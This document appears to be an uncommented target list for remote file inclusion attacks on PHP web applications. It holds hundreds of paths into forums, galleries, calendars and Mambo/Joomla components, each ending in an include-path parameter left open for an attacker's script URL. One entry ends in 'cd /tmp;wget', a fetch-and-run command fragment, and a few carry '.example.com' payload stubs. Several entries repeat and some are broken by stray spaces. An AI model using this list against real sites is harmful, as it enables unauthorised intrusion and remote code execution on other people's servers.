/dkp/includes/dbal.php?eqdkp_root_path=
/path/include/SQuery/gameSpy2.php?libpath=
/include/global.php?GLOBALS[includeBit]=
/topsites/config.php?returnpath=
/manager/frontinc/prepend.php?_PX_config[manager_path]=
/ubbthreads/addpost_newpoll.php?addpoll=thispath=
/forum/addpost_newpoll.php?thispath=
/forums/addpost_newpoll.php?thispath=
/ubbthreads/ubbt.inc.php?thispath=
/forums/ubbt.inc.php?thispath=
/forum/ubbt.inc.php?thispath=
/forum/admin/addentry.php?phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/orderSuccess.inc.php?glob[rootDir]=
/stats.php?dir[func]=dir[base]=
/ladder/stats.php?dir[base]=
/ladders/stats.php?dir[base]=
/sphider/admin/configset.php?settings_dir=
/admin/configset.php?settings_dir=
/vwar/admin/admin.php?vwar_root=
/modules/vwar/admin/admin.php?vwar_root=
/modules/vWar_Account/includes/get_header.php?vwar_root=
/modules/vWar_Account/includes/functions_common.php?vwar_root2=
/sphider/admin/configset.php?settings_dir=
/admin/configset.php?settings_dir=
/impex/ImpExData.php?systempath=
/forum/impex/ImpExData.php?systempath=
/forums/impex/ImpExData.php?systempath=
/cgi-bin//classes/adodbt/sql.php?classes_dir=
/cgi-bin/install/index.php?G_PATH=
/cgi-bin/include/print_category.php?dir=
/includes/class_template.php?quezza_root_path=
/bazar/classified_right.php?language_dir=
/classified_right.php?language_dir=
/phpBazar/classified_right.php?language_dir=
/modules/center/admin/accounts/process.php?module_path]=
/chat/messagesL.php3?cmd=
/phpMyChat/chat/messagesL.php3?cmd=
/bbs/include/write.php?dir=
/research/boards/encapsbb-0.3.2_fixed/index_header.php?root=
/Farsi1/index.php?archive=
/index.php?archive=
/show_archives.php?template=
/forum/include/common.php?pun_root=
/pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=
/vuln.php?=
/cgi-bin//include/write.php?dir=
/admin/common.inc.php?basepath=
/pm/lib.inc.php?sfx=
/pm/lib.inc.php?pm_path=
/artmedic-kleinanzeigen-path/index.php?id=
/index.php?pagina=
/osticket/include/main.php?include_dir=
/include/main.php?config[search_disp]=include_dir=
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
/quick_reply.php?phpbb_root_path=
/zboard/include/write.php?dir=
/PATH/admin/plog-admin-functions.php?configbasedir=
/path_to_phpgreetz/content.php?content=
/path_to_qnews/q-news.php?id=
/_conf/core/common-tpl-vars.php?confdir=
/votebox.php?VoteBoxPath=
/al_initialize.php?alpath=
/include/db.php?GLOBALS[rootdp]=
/modules/news/archivednews.php?GLOBALS[language_home]=
/protection.php?siteurl=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
/index2.php?includes_dir=
/classes.php?LOCAL_PATH=
/extensions/moblog/moblog_lib.php?basedir=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/phpWebLog/include/init.inc.php?G_PATH=
/admin/objects.inc.php4?Server=
/trg_news30/trgnews/install/article.php?dir=
/block.php?Include=
/arpuivo.php?data=
/path_to_gallery/setup/index.php?GALLERY_BASEDIR=
/include/help.php?base=
/index.php?[Home]=
/path_to_script/block.php?Include=
/examples/phonebook.php?page=
/PHPNews/auth.php?path=
/include/print_category.php?dir=
/skin/zero_vote/login.php?dir=
/skin/zero_vote/setup.php?dir=
/skin/zero_vote/ask_password.php?dir=
/gui/include/sql.php?include_path=
/webmail/lib/emailreader_execute_on_each_page.inc.php?emailread er_ini=
/email.php?login=cer_skin=
/PhotoGal/ops/gals.php?news_file=
/index.php?custom=
/loginout.php?cutepath=
/oneadmin/config.php?path[docroot]=
/xcomic/initialize.php?xcomicRootPath=
/skin/zero_vote/setup.php?dir=
/skin/zero_vote/error.php? dir=
/admin_modules/admin_module_captions.inc.php?config[path_src_include]=
/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
/admin_modules/admin_module_edit.inc.php?config[path_src_include]=
/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
/src/index_overview.inc.php?config[path_src_include]=
/src/index_leftnavbar.inc.php?config[path_src_include]=
/src/index_image.inc.php?config[path_src_include]=
/src/image-gd.class.php?config[path_src_include]=
/src/image.class.php?config[path_src_include]=
/src/album.class.php?config[path_src_include]=
/src/show_random.inc.php?config[path_src_include]=
/src/main.inc.php?config[path_src_include]=
/src/index_passwd-admin.inc.php?config[path_admin_include]=
/yappa-ng/src/index_overview.inc.php?config[path_src_include]=
/src/index_overview.inc.php?config[path_src_include]=
/src/image-gd.class.php?config[path_src_include]=
/src/image.class.php?config[image_module]=
/src/album.class.php?config[path_src_include]=
/src/show_random.inc.php?config[path_src_include]=
/src/main.inc.php?config[path_src_include]=
/includes/db_adodb.php?baseDir=
/includes/db_connect.php?baseDir=
/includes/session.php?baseDir=
/modules/projects/gantt.php?dPconfig[root_dir]=
/modules/projects/gantt2.php?dPconfig[root_dir]=
/modules/projects/vw_files.php?dPconfig[root_dir]=
/modules/admin/vw_usr_roles.php?baseDir=
/modules/public/calendar.php?baseDir=
/modules/public/date_format.php?baseDir=
/modules/tasks/gantt.php?baseDir=
/mantis/login_page.php?g_meta_include_file=
/phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=
/modules/My_eGallery/public/displayCategory.php?basepath=
/dotproject/modules/files/index_table.php?root_dir=
/nukebrowser.php?filnavn=
/bug_sponsorship_list_view_inc.php?t_core_path=
/includes/calendar.php?phpc_root_path=
/includes/setup.php?phpc_root_path=
/phpBB/admin/admin_styles.php?mode=
/aMember/plugins/db/mysql/mysql.inc.php?config=
/admin/lang.php?CMS_ADMIN_PAGE=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/becommunity/community/index.php?pageurl=
/CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=
/inc/formmail.inc.php?script_root=
/include/init.inc.php?G_PATH=
/backend/addons/links/index.php?PATH=
/modules/newbb_plus/class/class.forumposts.php?bbPath[path]=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/protection.php?siteurl=
/htmltonuke.php?filnavn=
/mail_autocheck.php?pm_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/e107/e107_handlers/secure_img_render.php?p=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix=
/community/modules/agendax/addevent.inc.php?agendax_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/myPHPCalendar/admin.php?cal_dir=
/p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=
/db.php?path_local=
/phpGedView/individual.php?PGV_BASE_DIRECTORY=
/index.php?kietu[url_hit]=
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
/Sources/Packages.php?sourcedir=
/yabbse/Sources/Packages.php?sourcedir=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/cgi-bin//gadgets/Blog/BlogModel.php?path=
/cgi-bin//admin.php?cal_dir=
/gallery/captionator.php?GALLERY_BASEDIR=
/cgi-bin/main.php?x=
/Blog/BlogModel.php?path=
/admin.php?cal_dir=
/expanded.php?conf=
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/pollvote/pollvote.php?pollname=
/displayCategory.php?basepath=
/phpBB2/admin/admin_cash.php?phpbb_root_path=
/modules/foro/includes/functions_admin.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpEx=
/modules/Forums/admin/admin_disallow.php?phpEx=
/modules/Forums/admin/admin_smilies.php?phpEx=
/modules/Forums/admin/admin_board.php?phpEx=
/modules/Forums/admin/admin_users.php?phpEx=
/modules/Forums/admin/admin_mass_email.php?phpEx=
/modules/Forums/admin/admin_forum_prune.php?phpEx=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/mt-comments.cgi?id=
/webcalendar/tools/send_reminders.php?includedir=
/cmd/product_info.php/products_id/1622/shop_content.php?coID=
/addevent.inc.php?agendax_path=
/step_one.php?server_inc=
/upgrade_album.php?GALLERY_BASEDIR=
/search.php?cutepath=
/modules.php?name=
/wagora/extras//quicklist.php?site=
/vCard/admin/define.inc.php?match=
/forum/ubbthreads.php?Cat=
/admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
/secure.php?cfgProgDir=
/modules/My_eGallery/public//inc/?HCL_path=
/modules/My_eGallery/public/imagen.php?basepath=
/adlayer.php?layerstyle=
/Forums/bb_smilies.php?name=
/modules/Forums/bb_smilies.php?name=
/gadgets/Blog/BlogModel.php?path=
/learnlinc/clmcpreload.php?CLPATH=
/modernbill/samples/news.php?DIR=
/religions/faq.php?page=
/forum/viewtopic.php?t=
/announcements.php?includePath=
/inc/header.php/step_one.php?server_inc=
/phpatm/index.php?include_location=
/gb/form.inc.php3?lang=
/shannen/index.php?x=
/family/phpgedview/index.php?PGV_BASE_DIRECTORY=
/main.php?left=
/forum/misc.php?action=
/nucleus/libs/globalfunctions.php?DIR_LIBS=
/show_archives.php?cutepath=
/gallery.php=
/magicforum/misc.php?action=
/forum/admin/actions/del.php?include_path=
/local/investing_industrialeastate1.php?a=
/modules/coppermine/themes/default/theme.php?THEME_DIR
/Popper/index.php?childwindow.inc.php?form=
/class.mysql.php?path_to_bt_dir=
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/eyeos/desktop.php?baccio=
/ashnews.php?pathtoashnews=
/becommunity/community/index.php?pageurl=
/modules/module_db.php?pivot_path=
/catalog/includes/include_once.php?include_file=
/cgi-bin/calendar.pl?fromTemplate=
/live/inc/pipe.php?HCL_path=
/zb41/include/write.php?dir=
/cgi-bin/awstats.pl?logfile=
/presse/stampa.php3?azione=
/inc/step_one_tables.php?server_inc=
/phpprojekt/lib/authform.inc.php?path_pre=
/captionator.php?GALLERY_BASEDIR=
/_head.php?_zb_path=.example.com
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=
/gallery/captionator.php?GALLERY_BASEDIR=.example.com
/globals.php3?LangCookie=.example.com
/include/msql.php?inc_dir=
/include/mssql7.php?inc_dir=
/include/mysql.php?inc_dir=
/include/oci8.php?inc_dir=
/include/postgres.php?inc_dir=
/include/postgres65.php?inc_dir=
/install.php?phpbb_root_dir=
/mantis/login_page.php?g_meta_inc_dir=
/phorum/admin/actions/del.php?include_path=
/pollensondage.inc.php?app_path=
/user/agora_user.php?inc_dir=
/user/ldap_example.php?inc_dir=
/userlist.php?ME=.example.com
/_functions.php?prefix=
/cpcommerce/_functions.php?prefix=
/ashnews.php?pathtoashnews=cd /tmp;wget
/eblog/blog.inc.php?xoopsConfig[xoops_url]=
/b2-tools/gm-2-b2.php?b2inc=
/includes/include_once.php?include_file=
/modules.php?name=jokeid=
/livehelp/inc/pipe.php?HCL_path=
/hcl/inc/pipe.php?HCL_path=
/support/faq/inc/pipe.php?HCL_path=
/help/faq/inc/pipe.php?HCL_path=
/helpcenter/inc/pipe.php?HCL_path=
/live-support/inc/pipe.php?HCL_path=
/gnu3/index.php?doc=
/gnu/index.php?doc=
/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/calendar.php?phpc_root_path=
/includes/setup.php?phpc_root_path=
/inc/authform.inc.php?path_pre=
/include/authform.inc.php?path_pre=
/web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=
/web_statistics//tools/send_reminders.php?includedir=
/web_statistics//include/write.php?dir=
/web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=
/web_statistics//calendar/tools/send_reminders.php?includedir=
/web_statistics//skin/zero_vote/error.php?dir=
/web_statistics//coppercop/theme.php?THEME_DIR=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/ashheadlines.php?pathtoashnews=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/sources/post.php?fil_config=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?chem_absolu=
/derniers_commentaires.php?rep=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/agendax/addevent.inc.php?agendax_path=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=
/calendar/calendar.php?serverPath=
/calendar/functions/popup.php?serverPath=
/calendar/events/header.inc.php?serverPath=
/calendar/events/datePicker.php?serverPath=
/calendar/setup/setupSQL.php?serverPath=
/calendar/setup/header.inc.php?serverPath=
/install/index.php?G_PATH=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/phpshop/index.php?base_dir=
/contacts.php?cal_dir=
/convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/ideabox/include.php?gorumDir=
/stats/modules/My_eGallery/index.php?basepath=
/stats/include/write.php?dir=
/stats/tools/send_reminders.php?includedir=
/index.cgiupgrade_album.php?GALLERY_BASEDIR=
/pollvote/pollvote.php?pollname
/includes/page_header.php?dir=
/index2.php?mosConfig_absolute_path=
/new/bbs//include/write.php?dir=
/index.php?mosConfig_absolute_path=
/_wk/wk_lang.php?wkPath=
/shoutbox/expanded.php?conf=
/myPHPCalendar/admin.php?cal_dir=
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
/library/editor/editor.php?root=
/library/lib.php?root=
/index.php?template=
/index.php?page=
/index.php?pag=
/index.php?pg=
/index.php?p=
/index.php?s=
/index.php?c=
/index.php?m=
/index.php?sayfa=
/index.php?include=
/index.php?content=
/index.php?cont=
/journal.php?m=
/links.php?c=
/forums.php?m=
/list.php?c=
/journal.php?m=
/user.php?xoops_redirect=
/index.php?id=
/index2.php?includes_dir=
/r.php?url=
/journal.php?m=
/index.php?m=
/links.php?c=
/forums.php?m=
/list.php?c=
/user.php?xoops_redirect=
/index.php?id=
/index.php/main.php?x=
/index.php?page=
/index.php?pag=
/index.php?include=
/index.php?content=
/index.php?cont=
/index.php?c=
/index.php?x=
/index.php?p=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?inc=
/includes/include_onde.php?include_file=
/index.php?pg=
/index.php?show=
/index.php?cat=
/index.php?meio=
/index.php?modpath=
/index.php?sqld=
/index.php?mainpage=
/index.php?site=
/index.php?pageurl=
/main.php?page=
/main.php?x=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?meio.php=
/index.php?configFile=
/index.php?do=
/page.php?template=
/index.php?file=
/index.php?hc=
/visitorupload.php?cmd=
/application.php?base_path=
/config.php?returnpath=
/editsite.php?returnpath=
/in.php?returnpath=
/addsite.php?returnpath=
/index.php?site_path=
/mail/index.php?site_path=
/fclick/show.php?path=
/show.php?path=
/index.php?inc_dir=
/index.php?theme_path=
/index.php?f=
/index.php?act=
/ipchat.php?root_path=
/become_editor.php?theme_path=
/add.php?theme_path=
/bad_link.php?theme_path=
/browse.php?theme_path=
/detail.php?theme_path=
/fav.php?theme_path=
/get_rated.php?theme_path=
/login.php?theme_path=
/mailing_list.php?theme_path=
/new.php?theme_path=
/modify.php?theme_path=
/pick.php?theme_path=
/power_search.php?theme_path=
/rating.php?theme_path=
/register.php?theme_path=
/review.php?theme_path=
/rss.php?theme_path=
/search.php?theme_path=
/send_pwd.php?theme_path=
/sendmail.php?theme_path=
/tell_friend.php?theme_path=
/top_rated.php?theme_path=
/user_detail.php?theme_path=
/user_search.php?theme_path=
/invoice.php?base_path=
/armygame.php?libpath=
/lire.php?rub=
/pathofhostadmin/?page=
/apa_phpinclude.inc.php?apa_module_basedir=
/index.php?req_path=
/print.php?val1=
/cmd.php?function=
/iframe.php?file=
/os/pointer.php?url=
/administrator/popups/pollwindow.php?mosConfig_absolute_path=
/administrator/popups/modulewindow.php?mosConfig_absolute_path=
/administrator/popups/contentwindow.php?mosConfig_absolute_path=
/administrator/index2.php?mosConfig_absolute_path=
/administrator/index3.php?mosConfig_absolute_path=
/administrator/popups/modulewindow.php?mosConfig_absolute_path=
/globals.php?mosConfig_absolute_path=
/index.php?mosConfig_absolute_path=
/index2.php?mosConfig_absolute_path=
/mainbody.php?mosConfig_absolute_path=
/offline.php?mosConfig_absolute_path=
/pathway.php?mosConfig_absolute_path=
/administrator/components/com_banners/admin.banners.html.php?mosConfig_absolute_path=
/administrator/components/com_banners/admin.banners.php?mosConfig_absolute_path=
/administrator/components/com_banners/toolbar.banners.html.php?mosConfig_absolute_path=
/administrator/components/com_banners/toolbar.banners.php?mosConfig_absolute_path=
/administrator/components/com_checkin/admin.checkin.php?mosConfig_absolute_path=
/administrator/components/com_config/admin.config.html.php?mosConfig_absolute_path=
/administrator/components/com_config/admin.config.php?mosConfig_absolute_path=
/administrator/components/com_config/toolbar.config.html.php?mosConfig_absolute_path=
/administrator/components/com_config/toolbar.config.php?mosConfig_absolute_path=
/administrator/components/com_contact/admin.contact.html.php?mosConfig_absolute_path=
/administrator/components/com_contact/admin.contact.php?mosConfig_absolute_path=
/administrator/components/com_contact/toolbar.contact.html.php?mosConfig_absolute_path=
/administrator/components/com_contact/toolbar.contact.php?mosConfig_absolute_path=
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=
/administrator/components/com_frontpage/admin.frontpage.html.php?mosConfig_absolute_path=
/administrator/components/com_frontpage/admin.frontpage.php?mosConfig_absolute_path=
/administrator/components/com_frontpage/toolbar.frontpage.html.php?mosConfig_absolute_path =
/administrator/components/com_frontpage/toolbar.frontpage.php?mosConfig_absolute_path=
/administrator/components/com_languages/admin.languages.html.php?mosConfig_absolute_path=
/administrator/components/com_languages/admin.languages.php?mosConfig_absolute_path=
/administrator/components/com_languages/toolbar.languages.html.php?mosConfig_absolute_path =
/administrator/components/com_languages/toolbar.languages.php?mosConfig_absolute_path=
/administrator/components/com_massmail/admin.massmail.html.php?mosConfig_absolute_path=
/administrator/components/com_massmail/admin.massmail.php?mosConfig_absolute_path=
/administrator/components/com_massmail/toolbar.massmail.html.php?mosConfig_absolute_path=
/administrator/components/com_massmail/toolbar.massmail.php?mosConfig_absolute_path=
/administrator/components/com_media/admin.media.html.php?mosConfig_absolute_path=
/administrator/components/com_media/admin.media.php?mosConfig_absolute_path=
/administrator/components/com_media/toolbar.media.html.php?mosConfig_absolute_path=
/administrator/components/com_media/toolbar.media.php?mosConfig_absolute_path=
/administrator/components/com_menus/admin.menus.html.php?mosConfig_absolute_path=
/administrator/components/com_menus/admin.menus.php?mosConfig_absolute_path=
/administrator/components/com_menus/components/components.class.php?mosConfig_absolute_path=
/administrator/components/com_menus/components/components.menu.html.php?mosConfig_absolute_path=
/administrator/components/com_menus/components/components.menu.php?mosConfig_absolute_path=
/administrator/components/com_menus/content_archive_category/content_archive_category.class.php?mosConfig_absol ute_path=
/administrator/components/com_menus/content_archive_category/content_archive_category.menu.html.php?mosConfig_a bsolute_path=
/administrator/components/com_menus/content_archive_category/content_archive_category.menu.php?mosConfig_absolu te_path=
/administrator/components/com_menus/content_archive_section/content_archive_section.class.php?mosConfig_absolu te_path=
/administrator/components/com_menus/content_archive_section/content_archive_section.menu.html.php?mosConfig_ab solute_path=
/administrator/components/com_menus/content_archive_section/content_archive_section.menu.php?mosConfig_absolut e_path=
/administrator/components/com_menus/content_blog_category/content_blog_category.class.php?mosConfig_absolute _path=
/administrator/components/com_menus/content_blog_category/content_blog_category.menu.html.php?mosConfig_abso lute_path=
/administrator/components/com_menus/content_blog_category/content_blog_category.menu.php?mosConfig_absolute_ path=
/administrator/components/com_menus/content_blog_section/content_blog_section.class.php?mosConfig_absolute_ path=
/administrator/components/com_menus/content_blog_section/content_blog_section.menu.html.php?mosConfig_absol ute_path=
/administrator/components/com_menus/content_blog_section/content_blog_section.menu.php?mosConfig_absolute_p ath=
/administrator/components/com_menus/content_category/content_category.class.php?mosConfig_absolute_path =
/administrator/components/com_menus/content_category/content_category.menu.html.php?mosConfig_absolute_ path=
/administrator/components/com_menus/content_category/content_category.menu.php?mosConfig_absolute_path=
/administrator/components/com_menus/content_section/content_section.class.php?mosConfig_absolute_path=
/administrator/components/com_menus/content_section/content_section.menu.html.php?mosConfig_absolute_p ath=
/administrator/components/com_menus/content_section/content_section.menu.php?mosConfig_absolute_path=
/administrator/components/com_menus/content_typed/content_typed.class.php?mosConfig_absolute_path=
/administrator/components/com_menus/content_typed/content_typed.menu.html.php?mosConfig_absolute_pat h=
/administrator/components/com_menus/content_typed/content_typed.menu.php?mosConfig_absolute_path=
/administrator/components/com_menus/separator/separator.class.php?mosConfig_absolute_path=
/administrator/components/com_menus/separator/separator.menu.html.php?mosConfig_absolute_path=
/administrator/components/com_menus/separator/separator.menu.php?mosConfig_absolute_path=
/administrator/components/com_menus/toolbar.menus.html.php?mosConfig_absolute_path=
/administrator/components/com_menus/toolbar.menus.php?mosConfig_absolute_path=
/administrator/components/com_menus/url/url.class.php?mosConfig_absolute_path=
/administrator/components/com_menus/url/url.menu.html.php?mosConfig_absolute_path=
/administrator/components/com_menus/url/url.menu.php?mosConfig_absolute_path=
/administrator/components/com_messages/admin.messages.html.php?mosConfig_absolute_path=
/administrator/components/com_messages/admin.messages.php?mosConfig_absolute_path=
/administrator/components/com_messages/toolbar.messages.html.php?mosConfig_absolute_path=
/administrator/components/com_messages/toolbar.messages.php?mosConfig_absolute_path=
/administrator/components/com_newsfeeds/admin.newsfeeds.html.php?mosConfig_absolute_path=
/administrator/components/com_newsfeeds/admin.newsfeeds.php?mosConfig_absolute_path=
/administrator/components/com_newsfeeds/newsfeeds.class.php?mosConfig_absolute_path=
/administrator/components/com_newsfeeds/toolbar.newsfeeds.html.php?mosConfig_absolute_path =
/administrator/components/com_newsfeeds/toolbar.newsfeeds.php?mosConfig_absolute_path=
/administrator/components/com_poll/admin.poll.html.php?mosConfig_absolute_path=
/administrator/components/com_poll/admin.poll.php?mosConfig_absolute_path=
/administrator/components/com_poll/toolbar.poll.html.php?mosConfig_absolute_path=
/administrator/components/com_poll/toolbar.poll.php?mosConfig_absolute_path=
/administrator/components/com_sections/admin.sections.html.php?mosConfig_absolute_path=
/administrator/components/com_sections/admin.sections.php?mosConfig_absolute_path=
/administrator/components/com_sections/toolbar.sections.html.php?mosConfig_absolute_path=
/administrator/components/com_sections/toolbar.sections.php?mosConfig_absolute_path=
/administrator/components/com_statistics/admin.statistics.html.php?mosConfig_absolute_path=
/administrator/components/com_statistics/admin.statistics.php?mosConfig_absolute_path=
/administrator/components/com_templates/admin.templates.html.php?mosConfig_absolute_path=
/administrator/components/com_templates/admin.templates.php?mosConfig_absolute_path=
/administrator/components/com_templates/toolbar.templates.html.php?mosConfig_absolute_path =
/administrator/components/com_templates/toolbar.templates.php?mosConfig_absolute_path=
/administrator/components/com_users/admin.users.html.php?mosConfig_absolute_path=
/administrator/components/com_users/admin.users.php?mosConfig_absolute_path=
/administrator/components/com_users/toolbar.users.html.php?mosConfig_absolute_path=
/administrator/components/com_users/toolbar.users.php?mosConfig_absolute_path=
/administrator/components/com_weblinks/admin.weblinks.html.php?mosConfig_absolute_path=
/administrator/components/com_weblinks/admin.weblinks.php?mosConfig_absolute_path=
/administrator/components/com_weblinks/toolbar.weblinks.html.php?mosConfig_absolute_path=
/administrator/components/com_weblinks/toolbar.weblinks.php?mosConfig_absolute_path=
/administrator/images/archive.png?mosConfig_absolute_path=
/administrator/images/archive_f2.png?mosConfig_absolute_path=
/administrator/images/back.png?mosConfig_absolute_path=
/administrator/images/back_f2.png?mosConfig_absolute_path=
/administrator/images/cancel.png?mosConfig_absolute_path=
/administrator/images/cancel_f2.png?mosConfig_absolute_path=
/administrator/images/css.png?mosConfig_absolute_path=
/administrator/images/css_f2.png?mosConfig_absolute_path=
/administrator/images/delete.png?mosConfig_absolute_path=
/administrator/images/delete_f2.png?mosConfig_absolute_path=
/administrator/images/edit.png?mosConfig_absolute_path=
/administrator/images/edit_f2.png?mosConfig_absolute_path=
/administrator/images/help.png?mosConfig_absolute_path=
/administrator/images/help_f2.png?mosConfig_absolute_path=
/administrator/images/html.png?mosConfig_absolute_path=
/administrator/images/html_f2.png?mosConfig_absolute_path=
/administrator/images/move.png?mosConfig_absolute_path=
/administrator/images/move_f2.png?mosConfig_absolute_path=
/administrator/images/new.png?mosConfig_absolute_path=
/administrator/images/new_f2.png?mosConfig_absolute_path=
/administrator/images/preview.png?mosConfig_absolute_path=
/administrator/images/preview_f2.png?mosConfig_absolute_path=
/administrator/images/publish.png?mosConfig_absolute_path=
/administrator/images/publish_f2.png?mosConfig_absolute_path=
/administrator/images/publish_g.png?mosConfig_absolute_path=
/administrator/images/publish_r.png?mosConfig_absolute_path=
/administrator/images/publish_y.png?mosConfig_absolute_path=
/administrator/images/save.png?mosConfig_absolute_path=
/administrator/images/save_f2.png?mosConfig_absolute_path=
/administrator/images/tick.png?mosConfig_absolute_path=
/administrator/images/unarchive.png?mosConfig_absolute_path=
/administrator/images/unarchive_f2.png?mosConfig_absolute_path=
/administrator/images/unpublish.png?mosConfig_absolute_path=
/administrator/images/unpublish_f2.png?mosConfig_absolute_path=
/administrator/images/upload.png?mosConfig_absolute_path=
/administrator/images/upload_f2.png?mosConfig_absolute_path=
/administrator/includes/auth.php?mosConfig_absolute_path=
/administrator/includes/pageNavigation.php?mosConfig_absolute_path=
/administrator/index.php?mosConfig_absolute_path=
/administrator/index2.php?mosConfig_absolute_path=
/administrator/index3.php?mosConfig_absolute_path=
/administrator/logout.php?mosConfig_absolute_path=
/administrator/popups/contentwindow.php?mosConfig_absolute_path=
/administrator/popups/modulewindow.php?mosConfig_absolute_path=
/administrator/popups/pollwindow.php?mosConfig_absolute_path=
/components/com_banners/banners.class.php?mosConfig_absolute_path=
/components/com_banners/banners.php?mosConfig_absolute_path=
/components/com_contact/contact.class.php?mosConfig_absolute_path=
/components/com_contact/contact.html.php?mosConfig_absolute_path=
/components/com_contact/contact.php?mosConfig_absolute_path=
/components/com_content/content.html.php?mosConfig_absolute_path=
/components/com_content/content.php?mosConfig_absolute_path=
/components/com_frontpage/frontpage.class.php?mosConfig_absolute_path=
/components/com_frontpage/frontpage.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php ?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/InsertFile/config.inc.php ?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/InsertFile/main.php ?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/insert_table.php ?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/select_character.php ?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/select_color.php ?mosConfig_absolute_path=
/components/com_login/login.html.php?mosConfig_absolute_path=
/components/com_login/login.php?mosConfig_absolute_path=
/components/com_messages/messages.class.php?mosConfig_absolute_path=
/components/com_newsfeeds/newsfeeds.php?mosConfig_absolute_path=
/components/com_poll/poll.html.php?mosConfig_absolute_path=
/components/com_poll/poll.php?mosConfig_absolute_path=
/components/com_registration/registration.html.php?mosConfig_absolute_path=
/components/com_registration/registration.php?mosConfig_absolute_path=
/components/com_rss/rss.php?mosConfig_absolute_path=
/components/com_search/search.html.php?mosConfig_absolute_path=
/components/com_search/search.php?mosConfig_absolute_path=
/components/com_user/user.html.php?mosConfig_absolute_path=
/components/com_user/user.php?mosConfig_absolute_path=
/components/com_weblinks/weblinks.class.php?mosConfig_absolute_path=
/components/com_weblinks/weblinks.html.php?mosConfig_absolute_path=
/components/com_weblinks/weblinks.php?mosConfig_absolute_path=
/editor/editor.php?mosConfig_absolute_path=
/editor/htmlarea3_xtd15/popups/InsertFile/config.inc.php?mosConfig_absolute_path=
/editor/htmlarea3_xtd15/popups/InsertFile/main.php?mosConfig_absolute_path=
/includes/HTML_toolbar.php?mosConfig_absolute_path=
/includes/agent_browser.php?mosConfig_absolute_path=
/includes/agent_os.php?mosConfig_absolute_path=
/includes/footer.php?mosConfig_absolute_path=
/includes/frontend.html.php?mosConfig_absolute_path=
/includes/frontend.php?mosConfig_absolute_path=
/includes/metadata.php?mosConfig_absolute_path=
/includes/pageNavigation.php?mosConfig_absolute_path=
/includes/pdf.php?mosConfig_absolute_path=
/includes/sef.php?mosConfig_absolute_path=
/language/english.ignore.php?mosConfig_absolute_path=
/language/english.php?mosConfig_absolute_path=
/language/english.xml?mosConfig_absolute_path=
/modules/mod_archive.php?mosConfig_absolute_path=
/modules/mod_latestnews.php?mosConfig_absolute_path=
/modules/mod_login.php?mosConfig_absolute_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/mod_mostread.php?mosConfig_absolute_path=
/modules/mod_newsflash.php?mosConfig_absolute_path=
/modules/mod_poll.php?mosConfig_absolute_path=
/modules/mod_related_items.php?mosConfig_absolute_path=
/modules/mod_rssfeed.php?mosConfig_absolute_path=
/modules/mod_sections.php?mosConfig_absolute_path=
/modules/mod_stats.php?mosConfig_absolute_path=
/modules/mod_templatechooser.php?mosConfig_absolute_path=
/modules/mod_whosonline.php ?mosConfig_absolute_path=
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=
/example/inc/top.inc.php?rootdir=
/core/index/index_album.php?P_LIB=
/core/index/index_album.php?P_INDEX=
/classes/class_mail.inc.php?path_to_folder=
